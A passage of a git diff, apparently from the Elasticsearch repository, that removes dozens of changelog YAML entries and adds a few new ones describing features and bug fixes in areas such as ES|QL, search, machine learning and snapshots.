remote clusters, e.g. missing indices, will not lead to a\ - \ failure of the query. Instead, the cluster is set to `skipped` or `partial` status\ - \ in the response metadata." - notable: false diff --git a/docs/changelog/128176.yaml b/docs/changelog/128176.yaml deleted file mode 100644 index 2cf76c4513772..0000000000000 --- a/docs/changelog/128176.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128176 -summary: Implement SAML custom attributes support for Identity Provider -area: Authentication -type: enhancement -issues: [] diff --git a/docs/changelog/128213.yaml b/docs/changelog/128213.yaml deleted file mode 100644 index a1f108cbbec8e..0000000000000 --- a/docs/changelog/128213.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128213 -summary: Refactor `SourceProvider` creation to consistently use `MappingLookup` -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/128218.yaml b/docs/changelog/128218.yaml deleted file mode 100644 index a3a291aa8d580..0000000000000 --- a/docs/changelog/128218.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128218 -summary: Improve exception for trained model deployment scale up timeout -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128241.yaml b/docs/changelog/128241.yaml deleted file mode 100644 index 26e3154fb7fde..0000000000000 --- a/docs/changelog/128241.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128241 -summary: Adding VoyageAI's v3.5 models -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128263.yaml b/docs/changelog/128263.yaml deleted file mode 100644 index 27ed06878dd40..0000000000000 --- a/docs/changelog/128263.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128263 -summary: Allow lookup join on mixed numeric fields -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128273.yaml b/docs/changelog/128273.yaml deleted file mode 100644 index 0f6a7ce2561d7..0000000000000 --- a/docs/changelog/128273.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128273 -summary: Improve get-snapshots message for unreadable repository -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/128278.yaml b/docs/changelog/128278.yaml deleted file mode 100644 index e8cc008a393df..0000000000000 --- a/docs/changelog/128278.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128278 -summary: ROUND_TO function -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128291.yaml b/docs/changelog/128291.yaml deleted file mode 100644 index 097bd8a44a4c6..0000000000000 --- a/docs/changelog/128291.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128291 -summary: Make `dense_vector` fields updatable to bbq_flat/bbq_hnsw -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/128298.yaml b/docs/changelog/128298.yaml deleted file mode 100644 index bfa16cb509304..0000000000000 --- a/docs/changelog/128298.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128298 -summary: Better handling of node ids from shutdown metadata (avoid NPE on already removed nodes) -area: Infra/Node Lifecycle -type: bug -issues: - - 100201 diff --git a/docs/changelog/128314.yaml b/docs/changelog/128314.yaml deleted file mode 100644 index f63a06e68177e..0000000000000 --- a/docs/changelog/128314.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128314 -summary: Fix NPE in APMTracer through `RestController` -area: Infra/REST API -type: bug -issues: [] diff --git a/docs/changelog/128323.yaml b/docs/changelog/128323.yaml deleted file mode 100644 index b6114c26ddc6e..0000000000000 --- a/docs/changelog/128323.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128323 -summary: "Fix: Allow non-score secondary sorts in pinned retriever sub-retrievers" -area: Relevance -type: bug -issues: [] diff --git a/docs/changelog/128361.yaml b/docs/changelog/128361.yaml deleted file mode 100644 index 901c1141afe90..0000000000000 --- a/docs/changelog/128361.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128361 -summary: The follower index should wait until the time series end time passes before unfollowing the leader index. -area: ILM+SLM -type: bug -issues: - - 128129 diff --git a/docs/changelog/128393.yaml b/docs/changelog/128393.yaml deleted file mode 100644 index 1f4a2bf8697f3..0000000000000 --- a/docs/changelog/128393.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128393 -summary: Pushdown constructs doing case-insensitive regexes -area: ES|QL -type: enhancement -issues: - - 127479 diff --git a/docs/changelog/128396.yaml b/docs/changelog/128396.yaml deleted file mode 100644 index 6e19a83d156e5..0000000000000 --- a/docs/changelog/128396.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128396 -summary: Delegated authorization using Microsoft Graph (SDK) -area: Authorization -type: feature -issues: [] diff --git a/docs/changelog/128399.yaml b/docs/changelog/128399.yaml deleted file mode 100644 index 042c1b9153f72..0000000000000 --- a/docs/changelog/128399.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128399 -summary: Allow missing shard stats for restarted nodes for `_snapshot/_status` -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/128405.yaml b/docs/changelog/128405.yaml deleted file mode 100644 index aefa068814747..0000000000000 --- a/docs/changelog/128405.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128405 -summary: Modify the mechanism to pause indexing -area: Distributed -type: bug -issues: [] diff --git a/docs/changelog/128449.yaml b/docs/changelog/128449.yaml deleted file mode 100644 index 12798783942e6..0000000000000 --- a/docs/changelog/128449.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128449 -summary: "[Draft] Support concurrent multipart uploads in Azure" -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/128464.yaml b/docs/changelog/128464.yaml deleted file mode 100644 index b8cd59c82b77f..0000000000000 --- a/docs/changelog/128464.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128464 -summary: Add support for parameters in LIMIT command -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128473.yaml b/docs/changelog/128473.yaml deleted file mode 100644 index 447ff998b1610..0000000000000 --- a/docs/changelog/128473.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128473 -summary: Conditionally force sequential reading in `LuceneSyntheticSourceChangesSnapshot` -area: Logs -type: enhancement -issues: [] diff --git a/docs/changelog/128504.yaml b/docs/changelog/128504.yaml deleted file mode 100644 index 7b451d27520aa..0000000000000 --- a/docs/changelog/128504.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128504 -summary: Add l2_norm normalization support to linear retriever -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/128509.yaml b/docs/changelog/128509.yaml deleted file mode 100644 index 2c51b4b684583..0000000000000 --- a/docs/changelog/128509.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128509 -summary: Use default Lucene postings format when index mode is standard. -area: Codec -type: enhancement -issues: [] diff --git a/docs/changelog/128519.yaml b/docs/changelog/128519.yaml deleted file mode 100644 index 20352e7102e98..0000000000000 --- a/docs/changelog/128519.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128519 -summary: Add support for LOOKUP JOIN on aliases -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128538.yaml b/docs/changelog/128538.yaml deleted file mode 100644 index bd4ab34ce2dca..0000000000000 --- a/docs/changelog/128538.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128538 -summary: "Added Mistral Chat Completion support to the Inference Plugin" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128584.yaml b/docs/changelog/128584.yaml deleted file mode 100644 index e5e380559786d..0000000000000 --- a/docs/changelog/128584.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128584 -summary: '`InferenceService` support aliases' -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128613.yaml b/docs/changelog/128613.yaml deleted file mode 100644 index 4d5d7bba03544..0000000000000 --- a/docs/changelog/128613.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128613 -summary: Improve support for bytecode patching signed jars -area: Infra/Core -type: enhancement -issues: [] diff --git a/docs/changelog/128615.yaml b/docs/changelog/128615.yaml deleted file mode 100644 index 9270c701c1bec..0000000000000 --- a/docs/changelog/128615.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128615 -summary: Fix and test off-heap stats when using direct IO for accessing the raw vectors -area: Vector Search -type: bug -issues: [] diff --git a/docs/changelog/128635.yaml b/docs/changelog/128635.yaml deleted file mode 100644 index 19a1dd0404ce1..0000000000000 --- a/docs/changelog/128635.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128635 -summary: Add `state` query param to Get snapshots API -area: Snapshot/Restore -type: enhancement -issues: - - 97446 diff --git a/docs/changelog/128653.yaml b/docs/changelog/128653.yaml deleted file mode 100644 index 6ecf29a22fbc2..0000000000000 --- a/docs/changelog/128653.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128653 -summary: Add retry for `AccessDeniedException` in `AbstractFileWatchingService` -area: Infra/Settings -type: bug -issues: [] diff --git a/docs/changelog/128694.yaml b/docs/changelog/128694.yaml deleted file mode 100644 index 031bec11899e5..0000000000000 --- a/docs/changelog/128694.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128694 -summary: "Adding Google VertexAI completion integration" -area: Inference -type: enhancement -issues: [ ] diff --git a/docs/changelog/128735.yaml b/docs/changelog/128735.yaml deleted file mode 100644 index 33ea2e4e97d91..0000000000000 --- a/docs/changelog/128735.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128735 -summary: Add option to include or exclude vectors from `_source` retrieval -area: Vector Search -type: feature -issues: [] diff --git a/docs/changelog/128736.yaml b/docs/changelog/128736.yaml deleted file mode 100644 index 6139acfd9fd4f..0000000000000 --- a/docs/changelog/128736.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128736 -summary: Add `index.lifecycle.skip` index-scoped setting to instruct ILM to skip processing specific indices -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/128737.yaml b/docs/changelog/128737.yaml deleted file mode 100644 index 5a710d4f836f5..0000000000000 --- a/docs/changelog/128737.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 128737 -summary: React more prompty to task cancellation while waiting for the cluster to - unblock -area: Task Management -type: enhancement -issues: - - 117971 diff --git a/docs/changelog/128746.yaml b/docs/changelog/128746.yaml deleted file mode 100644 index 028713ada4828..0000000000000 --- a/docs/changelog/128746.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128746 -summary: Fix computation of last block size in Azure concurrent multipart uploads -area: Snapshot/Restore -type: bug -issues: [] diff --git a/docs/changelog/128750.yaml b/docs/changelog/128750.yaml deleted file mode 100644 index 55971accbcb37..0000000000000 --- a/docs/changelog/128750.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 128750 -summary: Fix conversion of a Lucene wildcard pattern to a regexp -area: ES|QL -type: bug -issues: - - 128677 - - 128676 diff --git a/docs/changelog/128788.yaml b/docs/changelog/128788.yaml deleted file mode 100644 index e88444c67a1b3..0000000000000 --- a/docs/changelog/128788.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 105773 -summary: Inject an unfollow action before executing a downsample action in ILM -area: ILM+SLM -type: bug -issues: - - 105773 diff --git a/docs/changelog/128798.yaml b/docs/changelog/128798.yaml deleted file mode 100644 index d763b4d726458..0000000000000 --- a/docs/changelog/128798.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128798 -summary: Add transport version support for IDP_CUSTOM_SAML_ATTRIBUTES_ADDED_8_19 -area: IdentityProvider -type: enhancement -issues: [] diff --git a/docs/changelog/128805.yaml b/docs/changelog/128805.yaml deleted file mode 100644 index 6236649e17aa8..0000000000000 --- a/docs/changelog/128805.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128805 -summary: Add "extension" attribute validation to IdP SPs -area: IdentityProvider -type: enhancement -issues: [] diff --git a/docs/changelog/128848.yaml b/docs/changelog/128848.yaml deleted file mode 100644 index a928206d5568d..0000000000000 --- a/docs/changelog/128848.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128848 -summary: Add `bucketedSort` based on int -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/128854.yaml b/docs/changelog/128854.yaml deleted file mode 100644 index 65ef8829e4418..0000000000000 --- a/docs/changelog/128854.yaml +++ /dev/null @@ -1,11 +0,0 @@ -pr: 128854 -summary: Mark token pruning for sparse vector as GA -area: Machine Learning -type: feature -issues: [] -highlight: - title: Mark Token Pruning for Sparse Vector as GA - body: |- - Token pruning for sparse_vector queries has been live since 8.13 as tech preview. - As of 8.19.0 and 9.1.0, this is now generally available. - notable: true diff --git a/docs/changelog/128858.yaml b/docs/changelog/128858.yaml deleted file mode 100644 index 41c13e8c34ad8..0000000000000 --- a/docs/changelog/128858.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128858 -summary: Fix unsupported privileges error message during role and API key crea… -area: Authorization -type: enhancement -issues: - - 128132 diff --git a/docs/changelog/128870.yaml b/docs/changelog/128870.yaml deleted file mode 100644 index dbeee3c7b74ce..0000000000000 --- a/docs/changelog/128870.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128870 -summary: Check `TooComplex` exception for `HasPrivileges` body -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/128895.yaml b/docs/changelog/128895.yaml deleted file mode 100644 index a1487e47ebd36..0000000000000 --- a/docs/changelog/128895.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128895 -summary: Workaround for RLike handling of empty lang pattern -area: ES|QL -type: bug -issues: - - 128813 diff --git a/docs/changelog/128913.yml b/docs/changelog/128913.yml deleted file mode 100644 index 623897bb272a1..0000000000000 --- a/docs/changelog/128913.yml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128913 -summary: "[apm-data] Enable 'date_detection' for all apm data streams" -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/128914.yaml b/docs/changelog/128914.yaml deleted file mode 100644 index e2e9eed6558af..0000000000000 --- a/docs/changelog/128914.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128914 -summary: Make Adaptive Allocations Scale to Zero configurable and set default to 24h -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128925.yaml b/docs/changelog/128925.yaml deleted file mode 100644 index dd41f7366ddd1..0000000000000 --- a/docs/changelog/128925.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128925 -summary: ES|QL - Add `match_phrase` full text function (tech preview) -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128948.yaml b/docs/changelog/128948.yaml deleted file mode 100644 index a922104757083..0000000000000 --- a/docs/changelog/128948.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128948 -summary: ES|QL - Add COMPLETION command as a tech preview feature -area: ES|QL -type: feature -issues: -- 124405 diff --git a/docs/changelog/128986.yaml b/docs/changelog/128986.yaml deleted file mode 100644 index 3b3e734536817..0000000000000 --- a/docs/changelog/128986.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128986 -summary: Improve execution of terms queries over wildcard fields -area: Search -type: bug -issues: - - 128201 diff --git a/docs/changelog/129074.yaml b/docs/changelog/129074.yaml deleted file mode 100644 index 94e60079ea510..0000000000000 --- a/docs/changelog/129074.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129074 -summary: "[apm-data] Set `event.dataset` if empty for logs" -area: Data streams -type: bug -issues: [] diff --git a/docs/changelog/129089.yaml b/docs/changelog/129089.yaml deleted file mode 100644 index cd7c553026eea..0000000000000 --- a/docs/changelog/129089.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129089 -summary: Update `sparse_vector` field mapping to include default setting for token pruning -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/129122.yaml b/docs/changelog/129122.yaml deleted file mode 100644 index eaed27e326c0f..0000000000000 --- a/docs/changelog/129122.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129122 -summary: Update ecs@mappings.json with new GenAI fields -area: Data streams -type: feature -issues: [] diff --git a/docs/changelog/129126.yaml b/docs/changelog/129126.yaml deleted file mode 100644 index b719af9892ba3..0000000000000 --- a/docs/changelog/129126.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129126 -summary: "Synthetic source: avoid storing multi fields of type text and `match_only_text`\ - \ by default" -area: Mapping -type: bug -issues: [] diff --git a/docs/changelog/129128.yaml b/docs/changelog/129128.yaml deleted file mode 100644 index 0bd52d4a6f86f..0000000000000 --- a/docs/changelog/129128.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129128 -summary: Add RemoveBlock API to allow `DELETE /{index}/_block/{block}` -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/129140.yaml b/docs/changelog/129140.yaml deleted file mode 100644 index e7ee59122c34f..0000000000000 --- a/docs/changelog/129140.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129140 -summary: Increment inference stats counter for shard bulk inference calls -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129150.yaml b/docs/changelog/129150.yaml deleted file mode 100644 index 5e53f6f6a9171..0000000000000 --- a/docs/changelog/129150.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129150 -summary: Add `none` chunking strategy to disable automatic chunking for inference - endpoints -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/129161.yaml b/docs/changelog/129161.yaml deleted file mode 100644 index a871fff01c9d7..0000000000000 --- a/docs/changelog/129161.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129161 -summary: Add Telemetry for models without adaptive allocations -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129164.yaml b/docs/changelog/129164.yaml deleted file mode 100644 index 0d16fdf1b239e..0000000000000 --- a/docs/changelog/129164.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129164 -summary: Log partial failures -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/129170.yaml b/docs/changelog/129170.yaml deleted file mode 100644 index 540dc5a50994d..0000000000000 --- a/docs/changelog/129170.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129170 -summary: Add Support for LIKE (LIST) -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/129181.yaml b/docs/changelog/129181.yaml deleted file mode 100644 index b19c2c8c32c30..0000000000000 --- a/docs/changelog/129181.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129181 -summary: Add Cluster Feature for L2 Norm -area: "Search" -type: bug -issues: [] diff --git a/docs/changelog/129200.yaml b/docs/changelog/129200.yaml deleted file mode 100644 index c657283682c4e..0000000000000 --- a/docs/changelog/129200.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129200 -summary: Simplified Linear Retriever -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/129223.yaml b/docs/changelog/129223.yaml deleted file mode 100644 index ec84ec52c8cf7..0000000000000 --- a/docs/changelog/129223.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129223 -summary: Fix text similarity reranker does not propagate min score correctly -area: Search -type: bug -issues: [] diff --git a/docs/changelog/129245.yaml b/docs/changelog/129245.yaml deleted file mode 100644 index 1a05e4340b4b3..0000000000000 --- a/docs/changelog/129245.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129245 -summary: Throttle indexing when disk IO throttling is disabled -area: Engine -type: enhancement -issues: [] diff --git a/docs/changelog/129278.yaml b/docs/changelog/129278.yaml deleted file mode 100644 index 567fc9e5696f0..0000000000000 --- a/docs/changelog/129278.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129278 -summary: Fix constant keyword optimization -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/129302.yaml b/docs/changelog/129302.yaml deleted file mode 100644 index 061fb34ab28ba..0000000000000 --- a/docs/changelog/129302.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129302 -summary: Move HTTP content aggregation from Netty into `RestController` -area: Network -type: enhancement -issues: - - 120746 diff --git a/docs/changelog/129325.yaml b/docs/changelog/129325.yaml deleted file mode 100644 index cbbb309dceee0..0000000000000 --- a/docs/changelog/129325.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129325 -summary: Check for model deployment in inference endpoints before stopping -area: Machine Learning -type: bug -issues: - - 128549 diff --git a/docs/changelog/129326.yaml b/docs/changelog/129326.yaml deleted file mode 100644 index eb6bb3907bc50..0000000000000 --- a/docs/changelog/129326.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129326 -summary: Check positions on `MultiPhraseQueries` as well as phrase queries -area: Search -type: bug -issues: - - 123871 diff --git a/docs/changelog/129359.yaml b/docs/changelog/129359.yaml deleted file mode 100644 index 9b1f6234d6579..0000000000000 --- a/docs/changelog/129359.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129359 -summary: Add min score linear retriever -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/129367.yaml b/docs/changelog/129367.yaml deleted file mode 100644 index a8e466158999e..0000000000000 --- a/docs/changelog/129367.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129367 -summary: Run `TransportGetStatusAction` on local node -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/129370.yaml b/docs/changelog/129370.yaml deleted file mode 100644 index 73d1c25f4b34c..0000000000000 --- a/docs/changelog/129370.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 129370 -summary: Avoid dropping aggregate groupings in local plans -area: ES|QL -type: bug -issues: - - 129811 - - 128054 diff --git a/docs/changelog/129413.yaml b/docs/changelog/129413.yaml deleted file mode 100644 index 505b627c42b16..0000000000000 --- a/docs/changelog/129413.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129413 -summary: '`SageMaker` Elastic Payload' -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129440.yaml b/docs/changelog/129440.yaml deleted file mode 100644 index f4999f8c627d3..0000000000000 --- a/docs/changelog/129440.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129440 -summary: Fix filtered knn vector search when query timeouts are enabled -area: Vector Search -type: bug -issues: [] diff --git a/docs/changelog/129454.yaml b/docs/changelog/129454.yaml deleted file mode 100644 index 538c5266c6162..0000000000000 --- a/docs/changelog/129454.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129454 -summary: Aggressive release of shard contexts -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/129455.yaml b/docs/changelog/129455.yaml deleted file mode 100644 index 688dcc1bc04df..0000000000000 --- a/docs/changelog/129455.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129455 -summary: Prevent ILM from processing shrunken index before its execution state is copied over -area: ILM+SLM -type: bug -issues: - - 109206 diff --git a/docs/changelog/129503.yaml b/docs/changelog/129503.yaml deleted file mode 100644 index f91c08cd487e2..0000000000000 --- a/docs/changelog/129503.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129503 -summary: Pushdown Lookup Join past Project -area: ES|QL -type: enhancement -issues: - - 119082 diff --git a/docs/changelog/129507.yaml b/docs/changelog/129507.yaml deleted file mode 100644 index fa555433c34d6..0000000000000 --- a/docs/changelog/129507.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129507 -summary: Using a temp `IndexService` for template validation -area: Indices APIs -type: bug -issues: - - 129473 diff --git a/docs/changelog/129509.yaml b/docs/changelog/129509.yaml deleted file mode 100644 index 859ad837a3c8d..0000000000000 --- a/docs/changelog/129509.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129509 -summary: Fix NPE in `SemanticTextHighlighter` -area: Search -type: bug -issues: - - 129501 diff --git a/docs/changelog/129546.yaml b/docs/changelog/129546.yaml deleted file mode 100644 index 8cb57d8747925..0000000000000 --- a/docs/changelog/129546.yaml +++ /dev/null @@ -1,13 +0,0 @@ -pr: 129546 -summary: Upgrade to Lucene 10.2.2 -area: Search -type: upgrade -issues: [] -highlight: - title: Upgrade to lucene 10.2.2 - body: |- - * Reduce NeighborArray on-heap memory during HNSW graph building - * Fix IndexSortSortedNumericDocValuesRangeQuery for integer sorting - * ValueSource.fromDoubleValuesSource(dvs).getSortField() would throw errors when used if the DoubleValuesSource needed scores - ---- - notable: true diff --git a/docs/changelog/129557.yaml b/docs/changelog/129557.yaml deleted file mode 100644 index 99afe8e45b439..0000000000000 --- a/docs/changelog/129557.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129557 -summary: Pushdown for LIKE (LIST) -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/129600.yaml b/docs/changelog/129600.yaml deleted file mode 100644 index c97f08477f833..0000000000000 --- a/docs/changelog/129600.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 129600 -summary: Make flattened synthetic source concatenate object keys on scalar/object - mismatch -area: Mapping -type: bug -issues: - - 122936 diff --git a/docs/changelog/129606.yaml b/docs/changelog/129606.yaml deleted file mode 100644 index a3cd10626bc06..0000000000000 --- a/docs/changelog/129606.yaml +++ /dev/null @@ -1,35 +0,0 @@ -pr: 129606 -summary: Release FORK in tech preview -area: ES|QL -type: feature -issues: [] -highlight: - title: Release FORK in tech preview - body: |- - Fork is a foundational building block that allows multiple branches of execution. - Conceptually, fork is: - - a bifurcation of the stream, with all data going to each fork branch, followed by - - a merge of the branches, enhanced with a discriminator column called FORK: - - Example: - - [source,yaml] - ---------------------------- - FROM test - | FORK - ( WHERE content:"fox" ) - ( WHERE content:"dog" ) - | SORT _fork - ---------------------------- - - The FORK command add a discriminator column called `_fork`: - - [source,yaml] - ---------------------------- - | id | content | _fork | - |-----|-----------|-------| - | 3 | brown fox | fork1 | - | 4 | white dog | fork2 | - ---------------------------- - - notable: true diff --git a/docs/changelog/129647.yaml b/docs/changelog/129647.yaml deleted file mode 100644 index eec287179e294..0000000000000 --- a/docs/changelog/129647.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129647 -summary: Fix `PushQueriesIT.testLike()` fails -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/129657.yaml b/docs/changelog/129657.yaml deleted file mode 100644 index 95fc3f8cd24d0..0000000000000 --- a/docs/changelog/129657.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129657 -summary: Fix `PushQueryIT#testEqualityOrTooBig` -area: ES|QL -type: bug -issues: - - 129545 diff --git a/docs/changelog/129659.yaml b/docs/changelog/129659.yaml deleted file mode 100644 index 60fce08d58398..0000000000000 --- a/docs/changelog/129659.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129659 -summary: Simplified RRF Retriever -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/129738.yaml b/docs/changelog/129738.yaml deleted file mode 100644 index 38a33b5aefb3f..0000000000000 --- a/docs/changelog/129738.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129738 -summary: Watch SSL files instead of directories -area: TLS -type: bug -issues: [] diff --git a/docs/changelog/129884.yaml b/docs/changelog/129884.yaml deleted file mode 100644 index a3ae373f2dbd0..0000000000000 --- a/docs/changelog/129884.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129884 -summary: Move to the Cohere V2 API for new inference endpoints -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129904.yaml b/docs/changelog/129904.yaml deleted file mode 100644 index f8945cac1d3c3..0000000000000 --- a/docs/changelog/129904.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129904 -summary: Reverse disordered-version warning message -area: Infra/Core -type: bug -issues: [] diff --git a/docs/changelog/129962.yaml b/docs/changelog/129962.yaml deleted file mode 100644 index dd06742a74791..0000000000000 --- a/docs/changelog/129962.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129962 -summary: Simplified Linear & RRF Retrievers - Return error on empty fields param -area: Search -type: bug -issues: [] diff --git a/docs/changelog/130032.yaml b/docs/changelog/130032.yaml deleted file mode 100644 index 69140cdc3f83c..0000000000000 --- a/docs/changelog/130032.yaml +++ /dev/null @@ -1,12 +0,0 @@ -pr: 130032 -summary: ES|QL cross-cluster querying is now generally available -area: ES|QL -type: feature -issues: [] -highlight: - title: ES|QL cross-cluster querying is now generally available - body: |- - The ES|QL Cross-Cluster querying feature has been in technical preview since 8.13. - As of releases 8.19.0 and 9.1.0 this is now generally available. - This feature allows you to run ES|QL queries across multiple clusters. - notable: true diff --git a/docs/changelog/130083.yaml b/docs/changelog/130083.yaml deleted file mode 100644 index 1b32881659531..0000000000000 --- a/docs/changelog/130083.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 130083 -summary: Fix timeout bug in DBQ deletion of unused and orphan ML data -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/132853.yaml b/docs/changelog/132853.yaml new file mode 100644 index 0000000000000..ee60d04bbd3a8 --- /dev/null +++ b/docs/changelog/132853.yaml @@ -0,0 +1,5 @@ +pr: 132853 +summary: Bump bcpkix version +area: Security +type: upgrade +issues: [] diff --git a/docs/changelog/133080.yaml b/docs/changelog/133080.yaml new file mode 100644 index 0000000000000..78b6f579f5959 --- /dev/null +++ b/docs/changelog/133080.yaml @@ -0,0 +1,5 @@ +pr: 133080 +summary: "Disallow creating `semantic_text` fields in indices created prior to 8.11.0" +area: Relevance +type: bug +issues: [] diff --git a/docs/changelog/133198.yaml b/docs/changelog/133198.yaml new file mode 100644 index 0000000000000..8e664e571122c --- /dev/null +++ b/docs/changelog/133198.yaml @@ -0,0 +1,5 @@ +pr: 133198 +summary: Bump bc-fips to 1.0.2.6 +area: FIPS +type: upgrade +issues: [] diff --git a/docs/changelog/133392.yaml b/docs/changelog/133392.yaml new file mode 100644 index 0000000000000..da39ae520a8ae --- /dev/null +++ b/docs/changelog/133392.yaml @@ -0,0 +1,5 @@ +pr: 133392 +summary: Track memory in evaluators +area: ES|QL +type: bug 